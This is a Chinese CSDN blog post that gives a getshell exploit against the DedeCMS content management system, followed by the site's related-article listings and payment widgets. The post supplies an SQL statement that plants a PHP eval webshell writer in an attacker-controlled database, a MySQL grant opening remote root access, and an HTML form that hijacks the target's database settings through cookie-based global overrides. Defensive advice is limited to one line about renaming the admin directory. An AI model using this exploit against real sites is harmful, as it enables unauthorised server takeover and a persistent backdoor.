DEDECMS拿SHELL EXP

最新推荐文章于 2024-07-23 17:16:07 发布
最新推荐文章于 2024-07-23 17:16:07 发布
阅读量949 收藏
点赞数
分类专栏: 漏洞收集 文章标签: shell input fp insert action php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6748414
版权

此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell
因此大家一定要养成使用DEDECM建站时改后台名字的习惯。


MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '' WITH GRANT OPTION;

 

接下来:

前题条件,必须准备好自己的dede数据库,然后插入数据:

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval($_POST[c])?>\');echo "OK";@fclose($fp);{/dede:php}'); 
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究
 <form action="" method="post" name="QuickSearch" id="QuickSearch"onsubmit="addaction();">

<input type="text" value="http://www.laod.org/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />

<input type="text" value="dbhost"name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />

<input type="text"value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />

<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />

<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br/>

<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />

<input type="text" value="true" name="nocache" style="width:400">

<input type="submit"value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞分析 DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 ...
php远程写入shell,DeDecms远程写入漏洞webshell (dedecms漏洞)
weixin_34697798的博客
04-12 309
解释下Apache解析文件的流程:当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apa...
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9826
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
dedeCMS后台getshell(三种方法)
weixin_51692662的博客
11-29 1007
dedecms后台sql命令写入一句话
【漏洞复现】DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
做自己喜欢的事,并将其发挥到极致!
05-31 3541
uploads/dede/article_allowurl_edit.php存在缺少对该文件中写入内容的任何过滤是导致该漏洞的因素之一,在5.7.106之前的DedeCMS中发现了一个漏洞。它已被宣布为关键。受此漏洞影响的是文件uploads/dede/article_allowurl_edit.php的未知功能。操纵参数allurls会导致代码注入。可以远程发起攻击获得网站控制权限。
php写入织梦,dedeCMS远程写入getshell(测试版本V5.7)
weixin_39645041的博客
03-12 215
该漏洞必须结合apache的解析漏洞:当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。dede在安装完成,如果没有删除install文件夹,在install下会有一个index....
dedecms5.7/install/index.php.bak getshell方法(亲测成功)
风炫 致力于顶级网络安全专家
01-30 7593
我是从安全参考上看到这一篇文章,作者:yaseng 。 但是我自己亲自测试了一下,果然存在这个漏洞。 给大家讲下, 原文: Dedecms对于安装程序的处理方法就是重命名install.php+lock文件验证,改install.php  位install.php.bak但是在apache 对这类型文件会解析成php,即可以执行之,对于lock  文件验证,不是还有dedecms的全局
【转】dedecms最新版本修改任意管理员漏洞 附getshell exp
ITfinder
06-30 528
此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php: if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
dedecms一键解密工具
10-11
dedecms一键解密工具 用起来方便简单 添加地址直接一键使用 dedecms网络渗透专用
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
dedecms 网站地图插件
02-15
标题中的“dedecms 网站地图插件”指的是基于织梦内容管理系统(DedeCms)的一个功能扩展,即用于生成网站地图的插件。网站地图是网站优化的重要工具,它能帮助搜索引擎更好地理解和索引网站内容,提高网页的收录率...
紫色时尚类dedecms手机web模板
05-26
【紫色时尚类dedecms手机web模板】是一个专为移动端设计的网站模板,适用于追求独特与时尚感的网站。此模板基于流行的CMS系统——DEDECMS(织梦内容管理系统)构建,旨在提供一种视觉上引人注目的网页设计,使用户在...
ad_js.php getshell,Dedecms 后台getshell
weixin_32837047的博客
03-18 249
原文链接:传送门虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试...
【渗透实战】日常挖洞第一期_社工某企业dedeCMSshell
q848581720的博客
10-22 785
/禁止转载 原作者QQ:848581720/ ■重要细节全部打码 ■部分细节对外开放 ●漏洞已提交,无影响厂商忽略 注:日常挖洞系列基本上是记录平常遇到的非常普通的漏洞,毫无看点,仅仅记录挖洞的经验 ———————————————— 0X001收集信息 因为这是某个大型服务器集成的共享宽带型虚拟主机,所以我就不在这说是什么服务器了, 也不告诉大家域名是多少,只是让大家互相学习,交流经验。 首先在站...
dedeCMS后台getshell
qq_45300786的博客
05-12 1592
这里有三种方法 新建webshell和上传webshell 一、上传webshell 二、新建webshell shell工具连接成功 三、在默认模本里写入webshell 然后更新一下 连接shell工具 连上之后,在写入一个新的webshell,记得再把原来页面改回去。 shell工具连接这个系统文件 ...
织梦search.php,织梦dedecms plus/search.php注入漏洞修复及利用
weixin_39900286的博客
03-09 515
织梦dedecms的最近出的一高危漏洞,search.php注入漏洞;估计现在很多黑阔都非常爱dedecms,因为经常有各种漏洞爆出.很多利用起来也都很简单.下面是漏洞的详细利用细节:0×1:http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a报错如果为:Safe Alert: Request Error ...
python学习之dedecms exp编写
cxk
05-24 720
python学习之dedecms exp编写 针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。 exp # -*- coding:utf-8 -*- import requests import time def dada(url): url_index=url+"/install/index.php" headers = {"...
docker部署mysql8.x版本,编写shell脚本自动部署安装mysql
最新发布
qq_43700885的博客
07-23 395
*1.**先自行安装好docker环境,docker的镜像注册中心最好是国内的,例如执行一下命令直接修改docker配置,这里基本就按照成功了,直接输入docker查看日志命令查看容器启动情况。将下面的命令直接粘贴到文件install-mysql.sh。加载刚修改的配置文件并重新启动docker。**2.**创建mysql自动部署脚本文件。接下来直接执行脚本输入一下命令。出现下图红框标识就表示安装成功。
dedecmsshell
08-24
DedeCMS是一款常见的内容管理系统,它也存在一些被黑客利用的漏洞来获取shell权限。其中,有一种常见的方法是通过在广告管理模块中的新建广告功能中插入恶意代码来实现。具体操作是在广告内容处写入恶意代码并提交,然后利用ad_add.php文件进行处理,从而获取shell权限。这是一种比较常见的方式,但需要注意的是,这种漏洞只会影响特定版本的DedeCMS,且需要具有管理员权限才能进行操作。 除了在广告管理模块中利用漏洞获取shell权限外,还有其他一些常见的方法,比如利用网站管理员的添加插件功能来上传包含恶意代码的插件文件,从而达到获取shell权限的目的。此外,还可以通过执行SQL语句写入webshell的方式,或者利用文件包含的漏洞进行攻击。总的来说,获取DedeCMSshell权限有多种方法,黑客们会根据具体情况选择最适合的方法进行攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Dedecms 5.7 SP2后台getshell](https://blog.csdn.net/he_and/article/details/80890664)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [apache的网站配置目录_网站后台getshell的方法总结](https://blog.csdn.net/weixin_39977776/article/details/110105614)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值